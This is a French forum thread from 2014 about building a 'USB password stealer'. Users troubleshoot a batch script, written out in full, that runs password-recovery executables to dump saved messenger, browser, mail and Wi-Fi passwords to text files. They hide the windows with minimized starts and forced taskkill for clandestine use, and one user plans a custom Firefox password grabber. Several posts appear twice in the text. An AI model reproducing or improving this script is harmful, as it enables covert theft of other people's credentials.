USB Password Stealer
Root
3 Messages
Le mardi 2 décembre 2014 à 13:35:47
Bonjour,
J'ai découvert ce principe d'aspirer les mdp, j'ai voulu suivre ce tuto mais j'ai quelques soucis.
Déjà, je suis aller sur le site d'origine pour prendre les dernières versions
J'ai pris 4 exécutables, j'ai fait un .bat pour les lancer en utilisant la commande donnée dans le tuto, par exemple : start mspass.exe /stext mspass.txt
3 des .exe s'exécutent, (on voit les fenêtres s'ouvrir pour afficher ce qu'ils ont trouvé) mais je ne comprends pas pourquoi le 4ème ne veux pas marcher (me suis pas trompé dans le nom dans le .bat et il marche quand je l'ouvre manuellement)
Lorsque je ferme les différentes fenêtres, je vais voir la racine du dossier, et il n'y a pas de .txt, que des .cfg
Donc en gros, le .bat marche, mais les fenêtre ne s'ouvre pas 'discrètement' et ils ne me donnent pas de logs
Que faut il que je change ?
Merci d'avance =)
EDIT :
Bon j'ai resolu le probleme de 'discretion' en faisant des taskkill
Pour le coup, maintenant je vois un .txt !
Un seul sur les 4 exécutables ...
Voici mon .bat :
start /MIN mess.exe /stext mess.txt
taskkill /IM mess.exe /F
start /MIN Web.exe /stext Web.txt
taskkill /IM Web.exe /F
start /MIN mail.exe /stext mail.txt
taskkill /IM mail.exe /F
start /MIN Wifi.exe /stext Wifi.txt
taskkill /IM mail.exe /F
EDIT 2 :
J'ai reussi à créerdes .txt en changeant de commande :
start /MIN Wifi.exe > Wifi.txt
Mais les .txt sont vide ...
(j'ai bien des données à recupérer, enfin ils ne sont pas vide genre j'ai pas de mdp)
J'ai découvert ce principe d'aspirer les mdp, j'ai voulu suivre ce tuto mais j'ai quelques soucis.
Déjà, je suis aller sur le site d'origine pour prendre les dernières versions
J'ai pris 4 exécutables, j'ai fait un .bat pour les lancer en utilisant la commande donnée dans le tuto, par exemple : start mspass.exe /stext mspass.txt
3 des .exe s'exécutent, (on voit les fenêtres s'ouvrir pour afficher ce qu'ils ont trouvé) mais je ne comprends pas pourquoi le 4ème ne veux pas marcher (me suis pas trompé dans le nom dans le .bat et il marche quand je l'ouvre manuellement)
Lorsque je ferme les différentes fenêtres, je vais voir la racine du dossier, et il n'y a pas de .txt, que des .cfg
Donc en gros, le .bat marche, mais les fenêtre ne s'ouvre pas 'discrètement' et ils ne me donnent pas de logs
Que faut il que je change ?
Merci d'avance =)
EDIT :
Bon j'ai resolu le probleme de 'discretion' en faisant des taskkill
Pour le coup, maintenant je vois un .txt !
Un seul sur les 4 exécutables ...
Voici mon .bat :
start /MIN mess.exe /stext mess.txt
taskkill /IM mess.exe /F
start /MIN Web.exe /stext Web.txt
taskkill /IM Web.exe /F
start /MIN mail.exe /stext mail.txt
taskkill /IM mail.exe /F
start /MIN Wifi.exe /stext Wifi.txt
taskkill /IM mail.exe /F
EDIT 2 :
J'ai reussi à créerdes .txt en changeant de commande :
start /MIN Wifi.exe > Wifi.txt
Mais les .txt sont vide ...
(j'ai bien des données à recupérer, enfin ils ne sont pas vide genre j'ai pas de mdp)
Drikenof
16 Messages
Le mercredi 3 décembre 2014 à 10:01:37
Salut Root, juste une question, à quoi ca sert le /MIN et /IM ?
Le mercredi 3 décembre 2014 à 20:14:19
Salut,
Effectivement, les /stext peuvent être remplacés par >. Par contre je ne suis pas convaincu de l'utilité des /MIN, de ce que je sais, cette commande sert à exécuter un .bat minifié, ce qui n'est pas le cas ici.
C'est étonnant que tu sois obligé du killer les exe... je vais essayer tout ça de mon côté et je te tiens au courant.
J'ai constaté que les liens du tuto étaient morts, je vais corriger ça.
Bonne soirée.
PS : peux-tu mettre ton code entre balises [code=shell][/code] stp, merci.
Effectivement, les /stext peuvent être remplacés par >. Par contre je ne suis pas convaincu de l'utilité des /MIN, de ce que je sais, cette commande sert à exécuter un .bat minifié, ce qui n'est pas le cas ici.
C'est étonnant que tu sois obligé du killer les exe... je vais essayer tout ça de mon côté et je te tiens au courant.
J'ai constaté que les liens du tuto étaient morts, je vais corriger ça.
Bonne soirée.
PS : peux-tu mettre ton code entre balises [code=shell][/code] stp, merci.
Le mercredi 3 décembre 2014 à 21:28:12
Il semblerait que les exécutables ne se comportent plus de la même manière que lorsque j'ai écrit le tuto, j'ai l'impression qu'il n'est plus possible de les lancer en ligne de commande... c'est emmerdant
Je continue d'investiguer sur le sujet.
Version 1.50
Added new columns: Created Time, Last Time Used, Password Change Time, Password Use Count.
Removed the export command-line options from the official release, in order to decrease the rate of false Virus alerts.
Je continue d'investiguer sur le sujet.
Root
3 Messages
Le jeudi 4 décembre 2014 à 15:13:31
Bonjour =)
Oui, les fenêtres des .exe s’exécutent bien, mais sont visibles et ne se referme pas d'elles mêmes.
J'ai pu rendre l'utilisation des exécutable 'discrète' en les faisant s'ouvrir en 'réduit' avec le /MIN puis de les tuer directement.
A part une petite apparition de la fenêtre de commande, on voit presque rien.
Le second soucis, c'est l'enregistrement de la sortie des exécutables, en utilisant que /stext, j'ai l’apparition de fichiers de config (inutile ?).
Je pensais résoudre ce problème avec les > mais les fichier textes sont vide.
Je pense qu'il y a eu des changement de fonctionnement par rapport à un abus de l'utilisation clandestine que peut donner ce genre de programmes....
Et puis d'une manière générale, c'est plus possible d'exécuter un autorun sur des usb... La sécurité avant tout !
Mais bon, je continu de chercher aussi hehe
Oui, les fenêtres des .exe s’exécutent bien, mais sont visibles et ne se referme pas d'elles mêmes.
J'ai pu rendre l'utilisation des exécutable 'discrète' en les faisant s'ouvrir en 'réduit' avec le /MIN puis de les tuer directement.
A part une petite apparition de la fenêtre de commande, on voit presque rien.
Le second soucis, c'est l'enregistrement de la sortie des exécutables, en utilisant que /stext, j'ai l’apparition de fichiers de config (inutile ?).
Je pensais résoudre ce problème avec les > mais les fichier textes sont vide.
Je pense qu'il y a eu des changement de fonctionnement par rapport à un abus de l'utilisation clandestine que peut donner ce genre de programmes....
Et puis d'une manière générale, c'est plus possible d'exécuter un autorun sur des usb... La sécurité avant tout !
Mais bon, je continu de chercher aussi hehe
Le jeudi 4 décembre 2014 à 15:51:33
Oui je vois, l'ouverture/fermeture étant quasi immédiate, on n'a pas le temps de voir les fenêtres s'ouvrir.
En ce qui concerne les .cfg, ce sont les fichiers de config de chaque appli qui sont créés lorsqu'elles sont lancées en mode fenêtrées. Si tu regardes dedans, tu verras des informations concernant la position de la fenêtre, sa taille... etc.
C'est fort probable effectivement
Lorsque tu exécutes une ligne de commande et notamment un exécutable, celui-ci peut retourner un résultat sous forme de texte. Si tu l'exécute tel quel, le texte apparaitra dans la console. Afin d'enregistrer, ce texte dans un fichier, on utilise /stext ou >. Ils servent à ça.
Là, il semblerait qu'il ne soit plus possible d'exécuter les appli en ligne de commande et qu'on soit obligé de passé par le mode fenêtré, c'est pour ça que les fichiers textes sont vides...
Je crains que ce hack ne soit plus d'actualité et qu'il faille utiliser le mode fenêtré de chaque appli pour exporter les mdp.
Mais je me demande tout de même s'il n'est pas possible d'ordonner à l'application d'effectuer une série d'actions correspondant à "Fichier > enregistrer sous..."
Je pense qu'il faut creuser de ce côté.
En ce qui concerne les .cfg, ce sont les fichiers de config de chaque appli qui sont créés lorsqu'elles sont lancées en mode fenêtrées. Si tu regardes dedans, tu verras des informations concernant la position de la fenêtre, sa taille... etc.
Je pense qu'il y a eu des changement de fonctionnement par rapport à un abus de l'utilisation clandestine que peut donner ce genre de programmes....
C'est fort probable effectivement
Lorsque tu exécutes une ligne de commande et notamment un exécutable, celui-ci peut retourner un résultat sous forme de texte. Si tu l'exécute tel quel, le texte apparaitra dans la console. Afin d'enregistrer, ce texte dans un fichier, on utilise /stext ou >. Ils servent à ça.
Là, il semblerait qu'il ne soit plus possible d'exécuter les appli en ligne de commande et qu'on soit obligé de passé par le mode fenêtré, c'est pour ça que les fichiers textes sont vides...
Je crains que ce hack ne soit plus d'actualité et qu'il faille utiliser le mode fenêtré de chaque appli pour exporter les mdp.
Mais je me demande tout de même s'il n'est pas possible d'ordonner à l'application d'effectuer une série d'actions correspondant à "Fichier > enregistrer sous..."
Je pense qu'il faut creuser de ce côté.
Root
3 Messages
Le mercredi 10 décembre 2014 à 08:47:14
Salut !
Oui, si on peut effectuer des actions d'enregistrements, ça pourrai contourner le problème, mais ça va pas toucher un peu au temps d'exécution ?
De mon coté, je suis en train de voir à coder un aspi moi même, bon ça limite l'utilisation à firefox et c'est pas super optimisé, mais pas de fenêtre, et un temps d'exécution bien plus rapide -théoriquement-.
Oui, si on peut effectuer des actions d'enregistrements, ça pourrai contourner le problème, mais ça va pas toucher un peu au temps d'exécution ?
De mon coté, je suis en train de voir à coder un aspi moi même, bon ça limite l'utilisation à firefox et c'est pas super optimisé, mais pas de fenêtre, et un temps d'exécution bien plus rapide -théoriquement-.
Le mercredi 10 décembre 2014 à 09:43:16
Yop ! Comme tu le dit, ça serait une solution de contournement et effectivement le temps d'exécution en serait dégradé, mais pas au point de durer plus de 2 minutes à mon avis.
Qu'appelles-tu un "aspi" ? -> je viens de comprendre
En tout cas je suis complètement intéressé, donc n'hésite pas à partager ton code !
Quelle techno vas-tu utiliser ?
De mon coté, je suis en train de voir à coder un aspi moi même...
En tout cas je suis complètement intéressé, donc n'hésite pas à partager ton code !
Quelle techno vas-tu utiliser ?
bonbon
1 Messages
Le vendredi 22 mai 2015 à 18:16:32
Salut les ga, merci bcp pour c'est inportant info , est ce que vous pouvez donnez des autes idée cmt c'est commande s'ecrit ? est quelle langage ?
Le vendredi 22 mai 2015 à 21:14:37
Salut, ça fait un petit moment que j'ai pas vu Root sur le forum, j'espère qu'il verra ton message rapidement